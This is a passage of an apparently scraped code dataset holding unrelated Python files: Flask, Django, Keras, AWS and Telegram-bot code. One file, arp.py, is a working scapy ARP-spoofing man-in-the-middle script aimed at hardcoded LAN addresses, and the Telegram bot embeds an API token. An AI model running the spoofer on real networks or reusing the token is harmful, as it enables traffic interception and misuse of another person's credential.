handle_bad_request(e):\n return '404 Not Found!'\n\n\n# 模型渲染 信号监听\ndef log_template_renders(sender, template, context, **extra):\n print('test')\n sender.logger.debug('Rendering template \"%s\" with context %s',\n template.name or 'string template',\n context)\n\n\nfrom flask import template_rendered\n\ntemplate_rendered.connect(log_template_renders, app)\n\n\ndef user_required(f):\n \"\"\"Checks whether user is logged in or raises error 401.\"\"\"\n\n def decorator(*args, **kwargs):\n if not g.user:\n abort(401)\n return f(*args, **kwargs)\n\n return decorator\n\n\n# 可插拔视图\napp.add_url_rule('/class_view/', view_func=ClassViewAPI.as_view('users'))\n# 装饰视图,可移到类中\n# view = user_required(ClassViewAPI.as_view('users'))\n# app.add_url_rule('/users/', view_func=view)","sub_path":"flask_demo/template_demo.py","file_name":"template_demo.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"354127687","text":"#!/usr/bin/python3.6\n\"\"\"\nData Visualization module.\nPlot Data based on Temprature max, humidity,\n\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport pandas as pd\n\n\ndef format_date(date):\n y = date[0:4]\n m = date[4:6]\n d = date[6:8]\n return \"{}/{}/{}\".format(d, m, y)\n\n\ndef plotData():\n data = './data.csv'\n df = pd.read_csv(data)\n y_val = np.array(df[' _tempm'])\n\n dates = np.array(df['datetime_utc'])\n x_val = [ format_date(d) for d in dates ]\n\n n = len(x_val)\n start_index = n % 100000\n print(start_index)\n print(n)\n tmp = {}\n for i in range(start_index, n):\n #print(x_val[i], y_val[i])\n tmp[y_val[i]] = x_val[i]\n\n # Plotting data\n plt.figure(figsize = (12, 7))\n plt.plot(x_val, y_val, color = '#ff3f0f')\n plt.xticks(rotation='vertical')\n plt.show()\n\n\nplotData()\n\n","sub_path":"Delhi-Weather-Prediction/data_visualize.py","file_name":"data_visualize.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"360002612","text":"\"\"\"\nSlingshot Workflow Object.\n\"\"\"\n\nfrom slingshot.core.events import WorkflowEvents\nfrom slingshot.core.step import Step\nfrom slingshot.core.step import StepGroup\nfrom uuid import uuid4\n\n\nclass Workflow(object):\n \"\"\"A Workflow is a sequence consisting of a number of Steps.\n\n For use, create an instance of Step, then add step instance.\n When all the steps have been added, the workflow can be passed to a runner,\n such as LocalWorkflowRunner. It will run individual step in order in which\n they have been added, aggregating the results.\n \"\"\"\n\n def __init__(self, uuid=None, steps=(), events=None):\n self._steps = []\n self.add_steps(steps)\n self._history = []\n self.uuid = uuid or uuid4().hex\n self._events = events if events is not None else WorkflowEvents()\n\n def get_events(self):\n return self._events\n\n def add_step(self, step):\n \"\"\"Add step instance to the workflow\"\"\"\n if isinstance(step, dict):\n if step.get('type') == 'group':\n step = StepGroup(**step)\n else:\n step = Step(**step)\n elif not isinstance(step, (Step, StepGroup)):\n raise TypeError(\n \"Step must be instantiated before passing them to add_step()\")\n self._steps.append(step)\n\n def add_steps(self, steps):\n \"\"\"Add step instances to the workflow\"\"\"\n for step in steps:\n self.add_step(step)\n\n def as_dict(self):\n \"\"\"Dictionary representation of the workflow\"\"\"\n return {\n 'uuid': self.uuid,\n 'steps': list(s.as_dict() for s in self._steps)\n }\n\n def get_max_timeout(self, steps=None):\n if steps is None:\n steps = self._steps\n duration = 0\n for step in steps:\n if type(step) is StepGroup:\n if step.do:\n duration += self.get_max_timeout(step.do)\n if step.rollback:\n duration += self.get_max_timeout(step.rollback)\n else:\n # Add a tiny amount of wiggle room of 10 seconds\n # to allow time for tasks to be sent from SWF\n duration += step.timeout * step.max_retry + 10\n return duration\n\n def __eq__(self, other):\n return self.as_dict() == other.as_dict()\n\n def __iter__(self):\n return iter(self._steps)\n","sub_path":"slingshot/core/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"75635242","text":"import scapy.all as scapy\nimport time\n\ndef get_mac(ip):\n arp_request = scapy.ARP(pdst = ip)\n broadcast = scapy.Ether(dst =\"ff:ff:ff:ff:ff:ff\") \n arp_request_broadcast = broadcast / arp_request\n answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0] \n return answered_list[0][1].hwsrc\n\ndef spoof(target_ip, spoof_ip):\n packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip),psrc = spoof_ip)\n scapy.send(packet, verbose = False)\n\ndef restore(destination_ip, source_ip):\n destination_mac = get_mac(destination_ip)\n source_mac = get_mac(source_ip)\n packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac) \n scapy.send(packet, verbose = False)\n\ntarget_ip = \"10.10.202.196\" # 상대방 무선 LAN IPv4 주소\ngateway_ip = \"10.10.202.254\" # 나의 무선 LAN 기본 게이트웨이\n\ntry:\n sent_packets_count = 0\n while True:\n spoof(target_ip, gateway_ip) \n spoof(gateway_ip, target_ip)\n sent_packets_count = sent_packets_count + 2\n print(\"\\r[*] Packets Sent \"+str(sent_packets_count), end =\"\") \n time.sleep(2) # Waits for two seconds\n\nexcept KeyboardInterrupt:\n print(\"\\nCtrl + C pressed.............Exiting\")\n restore(gateway_ip, target_ip) \n restore(target_ip, gateway_ip)\n print(\"[+] Arp Spoof Stopped\")\n\n\n\n","sub_path":"python/arp.py","file_name":"arp.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373381829","text":"import boto3\nimport time\nimport paramiko\nfrom class_getRequest import cvsAPI\n\ncvs = cvsAPI()\ncvs.get_fileSystems()\ncvs.get_fileSystemsdetails()\ncvs.create_fileSystems()\n#update_fileSystems()\n#delete_filesystems()\n#cvs.create_snapshot()\ncvs.target_information()\nmnt = cvs.buildMountnameforCFT()\n#print(mnt)\n\ncft = boto3.client('cloudformation')\n\nclass cftStack(object):\n\n # create stack\n\n def createStack(self):\n stackname = \"prabuTest46\"\n with open('//users/arjunan/Documents/EC2instnaceSample.json', 'r') as f:\n create_cft = cft.create_stack(StackName=stackname, TemplateBody=f.read())\n print(\"Create Stack o/p - \", create_cft)\n\n # wait time for the Stack creation\n\n time.sleep(120)\n\n # list the stack created\n\n list_stack_resp = cft.list_stack_resources(StackName=stackname)\n if list_stack_resp['StackResourceSummaries'][0] != 0:\n instanceID = list_stack_resp['StackResourceSummaries'][0]['PhysicalResourceId']\n self.instanceID = instanceID\n print(\"Instance ID of the newly created instance : \", instanceID)\n else:\n print(\"Stack Creation failed\")\n\n #get the public DNS of the Intance created\n\n def intanceDetails(self):\n requiredInstance = self.instanceID\n #print(requiredInstance)\n ec2client = boto3.client('ec2')\n response = ec2client.describe_instances()\n for reservation in response[\"Reservations\"]:\n for instance in reservation[\"Instances\"]:\n # This sample print will output entire Dictionary object\n #print(instance)\n # This will print will output the value of the Dictionary key 'InstanceId'\n #print(instance[\"InstanceId\"])\n if (instance[\"InstanceId\"]) == requiredInstance:\n response = ec2client.describe_instances(\n Filters=[\n {\n 'Name': 'instance-id',\n 'Values': [requiredInstance]\n },\n ])\n publicipAddress = response['Reservations'][0]['Instances'][0]['PublicDnsName']\n self.publicipAddress = publicipAddress\n print(\"public ip address of the Instance creates is : \", publicipAddress)\n return\n else:\n print(\"Wait...\")\n\n\n\n def ssh_login(self):\n\n try:\n export = mnt\n sudo = \"sudo -s\"\n dirname = \"pythonscripttest12\"\n mkdir = \"sudo mkdir\" + \" \" + dirname\n dirpermissions = \"sudo chmod -R 755\" + \" \" + dirname\n mount = \"sudo mount -t nfs -o rw,hard,nointr,rsize=32768,wsize=32768,bg,nfsvers=3,tcp\" + \" \" + export + \" \" + dirname\n hostname1 = self.publicipAddress\n cert = paramiko.RSAKey.from_private_key_file(\"/Users/arjunan/Documents/prabu.pem\")\n c = paramiko.SSHClient()\n c.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n print (\"connecting to the newly created EC2 instance\")\n time.sleep(120)\n c.connect(hostname=hostname1, username=\"ec2-user\", pkey=cert)\n print(\"connected!!!\")\n stdin, stdout, stderr = c.exec_command(mkdir)\n stdin1, stdout1, stderr1 = c.exec_command(dirpermissions)\n stdin2, stdout2, stderr2 = c.exec_command(mount)\n #print(stdout.readlines(\"Directory creation successful\"))\n stdout.readlines()\n stdout1.readlines()\n stdout2.readlines()\n print(\"Mount Volume success \")\n c.close()\n\n except:\n print(\"Connection Failed!!!\")\n\nstack = cftStack()\nstack.createStack()\nstack.intanceDetails()\nstack.ssh_login()\n\n","sub_path":"cloudformation.py","file_name":"cloudformation.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"116035568","text":"\nmoves = 0\n\n\ndef solve(line, balls):\n global moves\n if(balls < moves):\n moves = balls\n i = 0\n while(i < len(line)-2):\n if(line[i] == 'o' and line[i+1] == 'o' and line[i+2] == '-'):\n mod = line[:i] + \"--o\"\n if(i < len(line)-3):\n mod = mod + line[i+3:]\n\n \n\n solve(mod, balls-1)\n if(line[i] == '-' and line[i+1] == 'o' and line[i+2] == 'o'):\n mod = line[:i] + \"o--\"\n if(i < len(line)-3):\n mod = mod + line[i+3:]\n \n\n solve(mod, balls-1)\n i+=1\n\n\ndef main():\n global moves\n n = int(input())\n\n while(n != 0):\n line = input()\n moves = line.count('o')\n solve(line, moves)\n print(moves)\n n-=1\n\nmain()","sub_path":"10651.py","file_name":"10651.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"229809491","text":"# draw two circles, the smaller one is inside the bigger one\n# using python matplotlib library\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# create a figure window\nfig = plt.figure(figsize=(6,6))\n\n# get the current axes, creating one if necessary.\nax = fig.gca()\n\n# set x and y limits of the current axes\nax.set_xlim([0,10])\nax.set_ylim([0,10])\n\n# draw a circle\ncircle1 = plt.Circle((5,5), 2, color='r', fill=False)\nax.add_artist(circle1)\n\n# draw a smaller circle\ncircle2 = plt.Circle((5,5), 1, color='b', fill=False)\nax.add_artist(circle2)\n\n# save the figure\nfig.savefig('circle.png')","sub_path":"circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"370309816","text":"import time\nimport pickle\nimport threading\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport requests\nfrom pymongo import MongoClient\n\n\nclass Simulation:\n def __init__(self, dba, constants):\n self.dba = dba\n self.constants = constants\n self.threads = []\n\n # Init. información de la BBDD secundaria que contiene predicciones meteorológicas\n self.weather_DB = 'weatherDB'\n self.weatherDB_COL = 'historicalCOL'\n self.sim_time = None\n\n # Nombre del modelo almacenado en local por el servicio de modelado\n self.filename = 'model.pkl'\n\n# Predicción de la viabilidad del arranque de la bomba\n def predictBootConditions(self, curr_time, sch_time, curr_temp, curr_water_temp, predicted_temp, sch_consig_temp):\n headers = ['Temperatura aigua impuls', 'Temperatura consigna', 'Temperatura exterior (AEMET)', 'Temperatura exterior (esperada)']\n\n #Cargar modelo generador por el Modelador\n autoBootModel = pickle.load(open(self.filename, 'rb'))\n\n #Predicción a partir del modelo\n if autoBootModel:\n temp_impuls = (float(curr_water_temp.replace(',', \".\")))\n temp_consigna = sch_consig_temp\n temp_exterior = (float(curr_temp.replace(',', \".\")))\n temp_exterior_pred = (float(predicted_temp.replace(',', \".\")))\n\n x = dict(zip(headers, [[temp_impuls], [temp_consigna], [temp_exterior], [temp_exterior_pred]]))\n x = pd.DataFrame.from_dict(x)\n y = autoBootModel.predict(x)[0]\n\n # Comprobación de las condiciones de arranque\n sch_time_obj = datetime.strptime(sch_time + \":00+0100\", '%Y-%m-%dT%H:%M:%S%z')\n curr_time_obj = datetime.strptime(curr_time, '%Y-%m-%dT%H:%M:%S%z')\n\n time_diff = self.datetimeDiffInMinutes(curr_time_obj, sch_time_obj)\n est_time_proj = self.datetimeDiffInMinutes(curr_time_obj, sch_time_obj - timedelta(minutes=y))\n\n print(\"Tiempo estimado para el arranque: \" + str(est_time_proj))\n\n # La bomba arranca asi el tiempo predecido para alcanzar la temperatura consignada es mayor a la\n # diferencia entre la hora actual y la hora establecida\n if y >= time_diff:\n return 1\n\n # La bomba arrancará también si se supera la hora establecida\n if curr_time_obj > sch_time_obj:\n return 1\n\n return 0\n\n# Ejecución del método de predicción de arranque en segundo plano\n def startNewSimulation(self, data, consigTemp):\n t = threading.Thread(target=self.predictBoot, args=(data, consigTemp))\n t.start()\n return 1\n\n# Método principal de la predicción de arranque\n def predictBoot(self, data, consigTemp):\n start = 0\n while start == 0:\n values = self.dba.getLastSensorValues()\n values = self.formatDataToString(values)\n\n # Se definen los parámetros necesarios para predecir el arranque\n curr_temp = values['Temperatura exterior (AEMET)'].replace(',', \".\") # Temperatura exterior actual\n curr_water_temp = values['Temperatura aigua impuls'] # Temperatura de actual de salida del tanque\n curr_time = values['Datetime'] # Fecha/Hora del evento (en intervalos de 15 minutos)\n sch_time = data[\"params\"] # Hora programada de entrada del usuario en la casa\n predicted_temp = self.getPredictedTemp(sch_time) # Temperatura predecida para la hora de entrada programada\n sch_consig_temp = consigTemp # Temperatura de salida del tanque a alcanzar a la hora de entrada del usuario\n\n start = self.predictBootConditions(curr_time, sch_time, curr_temp, curr_water_temp, predicted_temp, sch_consig_temp)\n\n # Comprueba la viabilidad del arranque cada X tiempo\n if start == 0:\n time.sleep(20)\n\n self.confirmBoot()\n\n# Diferencia de tiempo entre dos objetos datetime en horas\n def datetimeDiffInHours(self, curr_time_obj, sch_time_obj):\n #Hay que aproximar la fecha y hora a la hora en punto más cercana\n if curr_time_obj.minute >= 30:\n curr_time_obj = curr_time_obj + datetime.timedelta(hours=1)\n curr_time_obj = curr_time_obj.replace(minute=0, second=0)\n\n if sch_time_obj.minute >= 30:\n sch_time_obj = sch_time_obj + datetime.timedelta(hours = 1)\n sch_time_obj = sch_time_obj.replace(minute=0, second=0)\n \n # Calcular diferencia de horas\n diff = sch_time_obj - curr_time_obj \n diff_seconds = diff.total_seconds() # Diferencia de horas en segundos\n return divmod(diff_seconds, 3600)[0] #Diferencia de horas en horas\n\n# Diferencia de tiempo entre dos objetos datetime en minutos\n def datetimeDiffInMinutes(self, curr_time_obj, sch_time_obj):\n diff = sch_time_obj - curr_time_obj\n diff_seconds = diff.total_seconds() # Diferencia de horas en segundos\n return divmod(diff_seconds, 60)[0] # Diferencia de horas en horas\n\n# Formatar registro a string\n def formatDataToString(self, data):\n for value in data:\n if(isinstance(data[value], str)==False):\n data[value]=str(data[value])\n return data\n\n# Predecir temperatura exterior para la hora de entrada establecida a partir de una BBDD secundaria que permite obtener\n# información meteorológica posterior en el tiempo a la fecha actual de la simulación.\n def getPredictedTemp(self, sch_time):\n\n # Inicializar conex. con BBDD secundaria\n host = 'localhost'\n port = 27017\n con = MongoClient(host, port)\n db = con[self.weather_DB]\n col = db[self.weatherDB_COL]\n\n # Obtener temperatura exterior para la fecha/hora de entrada programada\n sch_time= sch_time + \":00+0100\"\n output = col.find_one({'Datetime': sch_time})\n output = self.formatDataToString(output)\n con.close()\n return output['Temperatura exterior (AEMET)']\n\n# Confirma el arranque y lo notifica al controlador del DT a través de la ruta /boot\n def confirmBoot(self):\n r = requests.get('http://127.0.0.1:5000//boot')\n print(r.status_code)","sub_path":"Services/Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"551731464","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Cita',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha_cita', models.DateField(verbose_name=b'Fecha de Cita')),\n ('hora_cita', models.TimeField(verbose_name=b'Hora de Cita')),\n ('pendiente', models.BooleanField(default=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Paciente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cedula', models.IntegerField(unique=True)),\n ('nombre', models.CharField(max_length=200)),\n ('apellidos', models.CharField(max_length=200)),\n ('telefono', models.IntegerField()),\n ('direccion', models.TextField()),\n ('medicamento', models.CharField(max_length=200)),\n ('enfermedad', models.CharField(max_length=200)),\n ('alergia', models.BooleanField(default=False)),\n ('observacion', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='cita',\n name='paciente',\n field=models.ForeignKey(to='citas_pacientes.Paciente'),\n preserve_default=True,\n ),\n ]\n","sub_path":"citas_pacientes/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"468367220","text":"import keras\nfrom keras.callbacks import Callback\nclass AdditionalValidationSets(Callback):\n def __init__(self, validation_sets, verbose=0, batch_size=1):\n \"\"\"\n :param validation_sets:\n a list of 3-tuples (validation_data, validation_targets, validation_set_name)\n or 4-tuples (validation_data, validation_targets, sample_weights, validation_set_name)\n :param verbose:\n verbosity mode, 1 or 0\n :param batch_size:\n batch size to be used when evaluating on the additional datasets\n \"\"\"\n super(AdditionalValidationSets, self).__init__()\n self.validation_sets = validation_sets\n for validation_set in self.validation_sets:\n if len(validation_set) not in [2, 3]:\n raise ValueError()\n self.epoch = []\n self.history = {}\n self.verbose = verbose\n self.batch_size = batch_size\n\n def on_train_begin(self, logs=None):\n self.epoch = []\n self.history = {}\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n self.epoch.append(epoch)\n\n # record the same values as History() as well\n for k, v in logs.items():\n self.history.setdefault(k, []).append(v)\n\n # evaluate on the additional validation sets\n for validation_set in self.validation_sets:\n if len(validation_set) == 3:\n validation_data, validation_targets, validation_set_name = validation_set\n sample_weights = None\n elif len(validation_set) == 4:\n validation_data, validation_targets, sample_weights, validation_set_name = validation_set\n else:\n raise ValueError()\n\n results = self.model.evaluate(x=validation_data,\n y=validation_targets,\n verbose=self.verbose,\n sample_weight=sample_weights,\n batch_size=self.batch_size)\n\n for i, result in enumerate(results):\n if i == 0:\n valuename = validation_set_name + '_loss'\n else:\n if type(self.model.metrics[i-1]) is str:\n valuename = validation_set_name + '_' + self.model.metrics[i-1]\n else:\n valuename = validation_set_name + '_' + self.model.metrics[i-1].__name__\n if i == 2:\n print(' - ' + valuename + ': {:.4f}'.format(result), end='')\n self.history.setdefault(valuename, []).append(result)\n print()\n","sub_path":"training/AdditionalValidationSets.py","file_name":"AdditionalValidationSets.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"480868047","text":"import datetime\n\nfrom django.test import Client, TestCase\n\nfrom .utils import create_admin_account, make_request\n\n\nclass MealApiTest(TestCase):\n \"\"\"Test for Meal API\"\"\"\n\n def setUp(self):\n self.client = Client()\n create_admin_account()\n self.data = {\n 'name': 'BreakFast',\n 'start_time': datetime.time(8, 30, 0),\n 'end_time': datetime.time(10, 0, 0)\n }\n\n def create_meal(self, name, start_time, end_time):\n query = '''\n mutation {\n createMeal(input: {name: \"%s\", startTime: \"%s\", endTime: \"%s\"}){\n meal{\n id,\n originalId,\n name\n }\n }\n }\n ''' % (name, start_time, end_time)\n\n return make_request(self.client, query, method='POST')\n\n def retrieve_meal(self, id):\n query = 'query {meal(id: \"%s\" ) {name}}' % (id)\n\n return make_request(self.client, query)\n\n def test_creation_of_meal_object(self):\n response = self.create_meal(self.data['name'],\n self.data['start_time'],\n self.data['end_time'])\n created_meal = response['meal']\n expected = {\n 'meal': {\n 'id': created_meal['id'],\n 'originalId': created_meal['originalId'],\n 'name': self.data['name']\n }\n }\n\n self.assertEqual(expected, response)\n\n def test_retrieval_of_one_meal_object(self):\n # Retrieve with valid id\n expected = {\n 'meal': {\n 'name': self.data['name']\n }\n }\n create_response = self.create_meal(self.data['name'],\n self.data['start_time'],\n self.data['end_time'])\n response = self.retrieve_meal(create_response['meal']['id'])\n self.assertEqual(expected, response)\n\n # Retrieve with invalid id\n self.assertEqual({'meal': None}, self.retrieve_meal(2))\n\n def test_updating_of_meal_object(self):\n create_response = self.create_meal(self.data['name'],\n self.data['start_time'],\n self.data['end_time'])\n # Update with valid id\n query = '''\n mutation{\n updateMeal(\n input: {\n id: \"%s\",\n name: \"breakfast edited\"\n }\n )\n {\n meal{\n id,\n name\n }\n }\n }\n ''' % (create_response['meal']['id'])\n expected = {\n 'meal': {\n 'id': create_response['meal']['id'],\n 'name': 'breakfast edited'\n }\n }\n response = make_request(self.client, query, 'POST')\n self.assertEqual(expected, response)\n\n # Update with invalid id\n query = '''\n mutation{\n updateMeal(\n input: {\n id: \"%s\",\n name: \"breakfast edited\"\n }\n )\n {\n meal{\n id,\n name\n }\n }\n }\n ''' % (\"wrong-id\")\n self.assertEqual({'meal': None}, make_request(self.client, query, 'POST'))\n\n def test_deletion_of_meal_object(self):\n # Delete with valid id\n create_response = self.create_meal(self.data['name'],\n self.data['start_time'],\n self.data['end_time'])\n query = '''\n mutation{\n deleteMeal(input: {id: \"%s\"}){\n meal{\n name\n }\n }\n }\n ''' % (create_response['meal']['id'])\n expected = {\n 'meal': {\n \"name\": self.data['name']\n }\n }\n response = make_request(self.client, query, 'POST')\n self.assertEqual(expected, response)\n self.assertEqual({'meal': None}, self.retrieve_meal(create_response['meal']['id']))\n\n # Delete with invalid id\n query = '''\n mutation{\n deleteMeal(input: {id: \"%s\"}){\n meal{\n name\n }\n }\n }\n ''' % (\"wrong-id\")\n self.assertEqual({'meal': None}, make_request(self.client, query, 'POST'))\n","sub_path":"app/api/tests/test_meal_api.py","file_name":"test_meal_api.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"408622532","text":"\r\nimport telebot\r\n\r\nfrom telebot import types\r\nfrom random import randint\r\n\r\ntoken = \"601141259:AAGHuH3ASwOyEryFKxqPQRUesjkivBINsOk\"\r\n\r\nbot = telebot.TeleBot(token)\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start_function(message):\r\n chat_id = message.chat.id\r\n user_markup = types.ReplyKeyboardMarkup(True, False)\r\n user_markup.row('Start a game', 'Rules')\r\n msg = bot.send_message(chat_id, \"Welcome to the 21 game, \" + message.chat.first_name + \"!\" , reply_markup=user_markup, parse_mode=\"Markdown\")\r\n bot.register_next_step_handler(msg, main_menu)\r\n\r\ndef help_function(message):\r\n chat_id = message.chat.id\r\n user_markup = types.ReplyKeyboardMarkup(True, False)\r\n user_markup.row('Back')\r\n msg = bot.send_message(chat_id,\r\n \"Glavnaja cel' igry - prinudit' sopernika vybrat' chislo 21. Mozhno vybirat' tol'ko sledujushhie tri chisla ot chisla sopernika. \" +\r\n \"Naprimer, esli sopernik vybral 4, to vy mozhete prodolzhit' vybrav 5,6 ili 7. Nel'zja brat' chislo bol'she 21-go. \" +\r\n \"Tot kto vyberet 21, tot proigral. Udachi!\",\r\n reply_markup=user_markup, parse_mode=\"Markdown\")\r\n bot.register_next_step_handler(msg, start_function)\r\n\r\ndef ask_turn_def(message):\r\n chat_id = message.chat.id\r\n user_markup = types.ReplyKeyboardMarkup(True, False)\r\n user_markup.row('Yes', 'No', 'Back')\r\n msg = bot.send_message(chat_id, \"Do you want to start first?\", reply_markup=user_markup, parse_mode=\"Markdown\")\r\n bot.register_next_step_handler(msg, turn_def)\r\n\r\ndef turn_def(message):\r\n chat_id = message.chat.id\r\n if message.text == \"Yes\":\r\n bot.send_message(chat_id, \"Game has started! Your turn first\")\r\n player_turn(message,0)\r\n elif message.text == \"No\":\r\n bot.send_message(chat_id, \"Game has started! My turn first\")\r\n bot_turn(message)\r\n else :\r\n start_function(message)\r\n\r\ndef player_turn(msg,num):\r\n chat_id = msg.chat.id\r\n if num == 21:\r\n end_game(msg,True)\r\n else:\r\n pl_markup = types.ReplyKeyboardMarkup(True, False)\r\n b1 = str(num + 1)\r\n b2 = str(num + 2)\r\n b3 = str(num + 3)\r\n if num == 19:\r\n pl_markup.row(b1, b2)\r\n pl_markup.row(\"Give up\")\r\n elif num == 20:\r\n pl_markup.row(b1)\r\n pl_markup.row(\"Give up\")\r\n else :\r\n pl_markup.row(b1, b2, b3)\r\n pl_markup.row(\"Give up\")\r\n c_num = bot.send_message(chat_id, \"Choose a number\", reply_markup=pl_markup, parse_mode=\"Markdown\")\r\n bot.register_next_step_handler(c_num, bot_turn)\r\n\r\ndef bot_turn(num):\r\n chat_id = num.chat.id\r\n if num.text == \"Give up\":\r\n end_game(num,False)\r\n elif num.text == \"21\":\r\n end_game(num,False)\r\n else:\r\n if num.text == \"No\":\r\n num.text = \"0\"\r\n c_num = int(num.text)\r\n if c_num == 0:\r\n c_num = randint (1,3)\r\n elif c_num < 4:\r\n c_num = 4\r\n elif c_num == 4:\r\n c_num = randint(5,7)\r\n elif c_num < 8:\r\n c_num = 8\r\n elif c_num == 8:\r\n c_num = randint(9,11)\r\n elif c_num < 12:\r\n c_num = 12\r\n elif c_num == 12:\r\n c_num = randint(13,15)\r\n elif c_num < 16:\r\n c_num = 16\r\n elif c_num == 16:\r\n c_num = randint(17,19)\r\n elif c_num < 20:\r\n c_num = 20\r\n elif c_num == 20:\r\n c_num = 21\r\n bot.send_message(chat_id, c_num)\r\n player_turn(num,c_num)\r\n\r\ndef end_game(message,win):\r\n chat_id = message.chat.id\r\n if win == True:\r\n bot.send_message(chat_id, \"Congrats!!! You won\")\r\n else :\r\n bot.send_message(chat_id, \"You lose. Better luck next time;)\")\r\n\r\n markup = types.ReplyKeyboardMarkup(True, False)\r\n markup.row('Main menu', 'Replay')\r\n msg = bot.send_message(chat_id, \"What's next?\", reply_markup=markup, parse_mode=\"Markdown\")\r\n bot.register_next_step_handler(msg, end_game_actions)\r\n\r\ndef end_game_actions(msg):\r\n if(msg.text == \"Main menu\"):\r\n start_function(msg)\r\n\r\n else:\r\n ask_turn_def(msg)\r\n\r\ndef main_menu(message):\r\n chat_id = message.chat.id\r\n bot.send_chat_action(chat_id,'typing')\r\n if message.text == \"Start a game\":\r\n ask_turn_def(message)\r\n elif message.text == \"Rules\":\r\n help_function(message)\r\n\r\n else:\r\n bot.send_message(chat_id, \"Unknown command. Please try again!\")\r\n start_function(message)\r\n #log(message, answer)\r\n\r\n\r\nif __name__ == '__main__':\r\n bot.polling(none_stop=True, interval=0)\r\n","sub_path":"my21game_bot.py","file_name":"my21game_bot.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"226319279","text":"\nfrom heuristic import Heuristic\nfrom state import State\nfrom planningProblem import PlanningProblem\n\nclass UnsatGoalsHeuristic(Heuristic):\n def heuristic(self, state, problem):\n # \"number of unsatisfied goals\" heuristic\n cost = 0\n\n # your code goes here\n goalState = problem.getGoal()\n currentState = State(list(state))\n \n # for literal in currentState.getLiterals():\n # if not goalState.containsLiteral(literal):\n # cost += 1\n \n currentState = State(list(state))\n for literal in goalState.getLiterals():\n if not currentState.isSatisfied(literal):\n cost += 1\n return cost\n","sub_path":"unsatgoalsheuristic.py","file_name":"unsatgoalsheuristic.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"474169419","text":"#It can be declared inside constructor and instance methods using self\n#It can be declared outside class using object reference\n\nclass Test:\n\tdef __init__(self):\n\t\tself.a=20 #declaring using constructor\n\n\tdef m1(self):\n\t\tself.b=30 #declaring using instance method\n\nt=Test()\nt.c=50 #declaring outside class\nprint(t.__dict__) #gives a dictionary with properties and their values as key-value pair\nt.m1() #when this method is invoked, b variable is declared \nprint(t.__dict__)","sub_path":"OOPS/Instance_Variable_Declaration.py","file_name":"Instance_Variable_Declaration.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"417204571","text":"import cv2\nimport matplotlib.pyplot as plt\n\nfrom src.filter_colors import FilterColors\n\nimg = cv2.imread('square1.jpg', 1)\nfc = FilterColors(img)\nidx = 1\nfor k in range(len(fc.rank_ranges)):\n img = fc.get_filtered_gray_image(k)\n plt.subplot(4, 4, idx)\n idx += 1\n plt.imshow(img, cmap='gray')\nplt.show()\n","sub_path":"try/colorRange1.py","file_name":"colorRange1.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"316257366","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\n\ndriver = webdriver.Chrome() # 打开 Chrome 浏览器\ndriver.get(\"https://event.beanfun.com/mabinogi/E20180517/index.aspx\") \n\n\ndriver.find_element_by_id(\"i12\").click()\n\ntry:\n \n 